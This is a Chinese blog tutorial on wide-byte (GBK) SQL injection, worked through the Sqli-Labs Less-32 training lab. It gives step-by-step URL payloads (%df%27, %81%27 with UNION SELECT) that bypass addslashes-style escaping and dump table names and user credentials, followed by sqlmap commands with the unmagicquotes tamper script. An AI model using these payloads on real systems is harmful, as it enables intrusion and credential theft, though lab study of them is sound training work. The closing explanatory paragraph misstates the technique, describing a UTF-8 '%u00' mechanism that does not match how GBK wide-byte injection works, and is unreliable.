SQL注入 | 宽字节注入2

SQL注入 | 宽字节注入2

1.宽字节注入基础

最常使用的宽字节注入是利用%df,其实我们只要第一个ASCII码大于128就可以了,比如ASCII码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图所示,然后在十六进制前面加%即可,即为%81

GBK首字节对应0x81-0xFE,尾字节对应0x40-0xFE(除0x7F)

2.宽字节注入代码分析

mysql_real_escape_string()addslashes()功能类似
在这里插入图片描述
上述函数过滤了反斜杠单双引号,MySQL使用了GBK编码

3.宽字节SQL注入演示

Sqli-Labs-Less32为例
1.当我们使用1'时,发现被单引号转义
在这里插入图片描述
2.使用前面讲到的知识点,使用下述语句进行探测

?id=1%df%27 --+

在这里插入图片描述

3.将%df换成%81进行探测,发现依然可以

?id=1%81%27 --+

在这里插入图片描述
4.查看注入点

?id=-1%81%27 union select 1,2,3--+

在这里插入图片描述

5.使用union注入,获取数据库信息

-1%81%27 union select 1,database(),3--+

在这里插入图片描述
6.得到数据库security,获取数据表信息

?id=-1%81%27 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+

在这里插入图片描述

7.字符串转十六进制在线网站
https://www.bejson.com/convert/ox2str/
在这里插入图片描述
因为单引号被过滤,因此将数据表名转换为十六进制
我们使用users表,查看其字段名

?id=-1%81%27 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273),3--+

在这里插入图片描述
8.获取字段内容

?id=-1%81%27 union select 1,(select group_concat(id,username,password) from users),3--+

在这里插入图片描述

4.sqlmap安全检测

1.使用sqlmap探测,可以发现可以使用布尔盲注报错注入时间盲注union注入

python2 sqlmap.py -u "http://url/?id=1" --tamper=unmagicquotes.py

在这里插入图片描述
2.获取数据库的信息

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-32/?id=1" --tamper=unmagicquotes.py --dbs

在这里插入图片描述
3.使用数据库security,获取表名信息

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-32/?id=1" --tamper=unmagicquotes.py -D security --tables

在这里插入图片描述
4.使用数据库security,数据表users,获取字段及内容

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-32/?id=1" --tamper=unmagicquotes.py -D security -T users --dump

在这里插入图片描述

宽字节注入是一种常见的 SQL 注入技术,它利用了一些编码方式对非 ASCII 字符进行编码的特点,从而绕过某些安全机制,达到执行恶意 SQL 语句的目的。 宽字节注入的原理是将非 ASCII 字符编码为多个 ASCII 字符,然后将这些 ASCII 字符作为参数传递给应用程序,应用程序在解析这些参数时,可能会将其视为多个独立的字符,从而绕过一些安全机制。 例如,假设我们有一个包含语句的 Web 应用程序: ``` SELECT * FROM users WHERE username='admin' AND password='123456'; ``` 如果我们想使用宽字节注入技术来执行恶意 SQL 语句,我们可以将输入的用户名编码为 UTF-8 格式,并在其后面添加一个宽字节(%u00),这样就可以绕过应用程序的安全机制,注入额外的 SQL 语句,例如: ``` SELECT * FROM users WHERE username='admin%u00' OR 1=1 -- ' AND password='123456'; ``` 在这个例子中,%u00 是一个宽字节,它将 'a' 编码为 '%61%00',这样在应用程序解析这个参数时,它会将其视为两个独立的字符:'a' 和 '\u00'。因此,应用程序将执行以下 SQL 语句: ``` SELECT * FROM users WHERE username='admin' OR 1=1 -- ' AND password='123456'; ``` 其中,'--' 表示注释符号,它可以使后面的 SQL 语句被忽略,从而达到绕过验证的目的。 需要注意的是,宽字节注入是一种常见的 SQL 注入技术,但并不是万能的,它只能绕过一些简单的安全机制,对于一些高级安全机制可能无法生效。因此,在开发应用程序时,应该使用参数化查询或 ORM 框架等技术来防止 SQL 注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值